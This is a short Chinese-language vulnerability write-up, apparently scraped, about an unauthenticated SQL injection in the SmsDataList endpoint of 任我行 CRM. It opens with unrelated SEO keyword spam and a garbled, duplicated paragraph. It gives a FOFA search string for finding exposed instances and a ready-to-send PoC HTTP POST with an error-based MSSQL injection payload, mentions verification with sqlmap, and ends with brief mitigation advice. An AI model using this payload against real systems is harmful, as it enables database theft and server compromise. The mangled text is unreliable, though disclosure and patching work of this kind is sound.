网络应用开发,宁波seo网络推广渠道介绍,wordpress文字环绕广告,手机开发者选项有什么用0x01 产品简介 任我行CRM#xff08;Customer Relationship Management#xff09;是一款专业的企业级CRM软件#xff0c;旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。
0x02 漏洞概述 任我行 CRM SmsDataList 接口处存在SQL注入漏洞#xff0c;未…0x01 产品简介 任我行CRMCustomer Relationship Management是一款专业的企业级CRM软件旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。
0x02 漏洞概述 任我行 CRM SmsDataList 接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。
0x03 复现环境
FOFA欢迎使用任我行CRM 0x04 漏洞复现
PoC
POST /SMS/SmsDataList/?pageIndex1pageSize30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ipKeywordsStartSendDate2020-06-17EndSendDate2020-09-17SenderTypeId0000000000and 1convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES(MD5,123456)))) AND CvNICvNI sqlmap验证 0x05 修复建议
临时缓解方案
限制访问来源地址如非必要不要将系统开放在互联网上。
升级修复方案
升级至安全版本或打补丁
